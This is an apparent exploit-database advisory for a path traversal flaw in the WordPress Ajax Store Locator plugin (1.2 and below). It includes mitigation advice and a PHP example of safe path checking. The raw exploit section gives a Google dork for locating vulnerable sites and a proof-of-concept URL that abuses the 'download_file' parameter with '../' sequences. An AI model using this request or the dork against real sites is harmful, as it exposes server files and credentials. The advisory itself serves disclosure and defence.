vendor: Ajax Store Locator
by: Claudio Viviani
CVSS: 7.5 HIGH
Arbitrary File Download
CWE: 22
Product Name: Ajax Store Locator
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: NO
Related CWE: Not specified
CPE: a:wordpress_ajax_store_locator:ajax_store_locator_wordpress:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7, Linux
2014

WordPress Ajax Store Locator <= 1.2 Arbitrary File Download

The WordPress Ajax Store Locator plugin, version 1.2 and below, is vulnerable to an arbitrary file download attack. The 'download_file' parameter of the 'sl_file_download.php' script is not properly sanitized, allowing an attacker to download arbitrary files from the server.

Mitigation:

Update to the latest version of the WordPress Ajax Store Locator plugin to prevent this vulnerability. Additionally, ensure that user input is properly sanitized before being used in file download operations.
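One way to apply the second mitigation point in a PHP download handler, shown as an added example that is not the plugin's code: the requested name is canonicalized and served only if it resolves inside a fixed directory. `DOWNLOAD_BASE_DIR` and `resolve_download_path()` are hypothetical names, and the `downloads` directory is an assumption.

```php
<?php
// Added example, not the plugin's own code. DOWNLOAD_BASE_DIR and
// resolve_download_path() are hypothetical names chosen for illustration.
const DOWNLOAD_BASE_DIR = __DIR__ . '/downloads';

/**
 * Map a user-supplied file name to a canonical path inside $baseDir.
 * Returns null when the input is malformed, the file does not exist,
 * or the resolved path falls outside $baseDir.
 */
function resolve_download_path(string $baseDir, $requested): ?string
{
    // Reject non-string input (e.g. download_file[]=x), empty values and NUL bytes.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, and returns false
    // when the target does not exist.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling
    // such as "downloads-old" is not accepted as being under "downloads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$path = resolve_download_path(DOWNLOAD_BASE_DIR, $_GET['download_file'] ?? null);
if ($path === null) {
    http_response_code(404); // same response for "missing" and "outside the base"
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . str_replace('"', '', basename($path)) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The containment check runs on the canonical path rather than on the raw parameter, so it does not depend on filtering particular `../` spellings or encodings.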
Source

Exploit-DB raw data:

######################

# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

# Software Link : Premium

# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator      

# Date : 2014-12-06

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]

"download_file" variable is not sanitized.

 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
		
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################